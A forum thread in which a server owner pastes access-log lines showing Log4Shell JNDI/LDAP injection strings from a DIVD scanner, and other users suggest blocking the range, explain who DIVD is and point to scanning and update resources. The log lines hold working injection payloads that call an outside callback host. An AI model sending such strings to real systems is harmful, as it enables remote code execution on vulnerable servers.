20.205.59.237 - - [15/Dec/2021:10:43:40 +0000] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2931.79 Safari/537.36"
194.5.73.6 - - [15/Dec/2021:15:36:18 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-9b3d222abc9923f7b0b6fbcacefc084f_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-9b3d222abc9923f7b0b6fbcacefc084f_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-9b3d222abc9923f7b0b6fbcacefc084f_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-9b3d222abc9923f7b0b6fbcacefc084f_${date:YYYYMMddHHmmss}_http_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [15/Dec/2021:15:36:18 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-9b3d222abc9923f7b0b6fbcacefc084f_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-9b3d222abc9923f7b0b6fbcacefc084f_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-9b3d222abc9923f7b0b6fbcacefc084f_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-9b3d222abc9923f7b0b6fbcacefc084f_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [15/Dec/2021:18:51:57 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-8cd4952dc1665f823d50c78d907e23d4_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-8cd4952dc1665f823d50c78d907e23d4_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-8cd4952dc1665f823d50c78d907e23d4_%24%7Bdate%3AYYYYMMddHHmmss%7D_http_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-8cd4952dc1665f823d50c78d907e23d4_${date:YYYYMMddHHmmss}_http_User-Agent.log4jdns.x00.it/}"
194.5.73.6 - - [15/Dec/2021:18:51:57 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-8cd4952dc1665f823d50c78d907e23d4_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-8cd4952dc1665f823d50c78d907e23d4_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-8cd4952dc1665f823d50c78d907e23d4_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_search.log4jdns.x00.it%2F%7D HTTP/1.1" 400 891 "-" "${jndi:ldap://divd-8cd4952dc1665f823d50c78d907e23d4_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.x00.it/}"
 
whats about to block 194.5.73.0/24 in CSF ?
.. btw this ip seems to belong to a security company - www.divd.nl , maybe they playing with your server?
 
johannes said:
whats about to block 194.5.73.0/24 in CSF ?
.. btw this ip seems to belong to a security company - www.divd.nl , maybe they playing with your server?
Click to expand...

DIVD / Team

Dutch Institute for Vulnerability Disclosure, we aim to make the digital world safer by reporting vulnerabilities we find in digital systems to the people who can fix them. We have a global reach, but do it Dutch style: open, honest, collaborative and for free.
www.divd.nl www.divd.nl

Could be they want a overview while they publish statics about vulnerabilitys

I know one from that team i just mailed hopes mailadress is still active ( and i get not in spam..) then we know later

EDIT: UH did you or someone on your box installed or use this?
log4shell scanner or test? > https://github.com/DIVD-NL/NCSC-NL-log4shell

As i did posted that links here in DA forum https://forum.directadmin.com/threa...is-an-enterprise-nightmare.65173/#post-339825
 
Last edited:
Could be they want a overview while they publish statics about vulnerabilitys

I know one from that team i just mailed hopes mailadress is still active ( and i get not in spam..) then we know later

EDIT: UH did you or someone on your box installed or use this?
log4shell scanner or test? > https://github.com/DIVD-NL/NCSC-NL-log4shell
Click to expand...


No idea about that! could you please tell me how scan my server for any unwanted script ?
how to check it has been installed on my server?
 
mikajaxxx said:
No idea about that! could you please tell me how scan my server for any unwanted script ?
how to check it has been installed on my server?
Click to expand...
If your own server and only you are admin with that user rights to install then probable their scripts not on your server.
But someone could scan your's with scripts from them originating or as it looks like that ip of that box from them

Sorry i don't know more about it only did a quick search / help for you.

You should know the software used on your box , therefore those links, and if you find software that is on those lists, then i advice the scans and more to prevent , also updates and ask those software vendors then or there are updates.

Main problem are very old then unsupported versions, read the thread on DA forum DA itself is OK.

Anyway do you thinks these are cause of high CPU ?

While wen did this started , so in logs you see dates for those scans , as cpu high started before those scans then could not be the cause i think!

If it is a VM , then also look for log4j at the VM vendor software while some have problems with that! ;)
 
Last edited:
You must log in or register to reply here.
Back
Top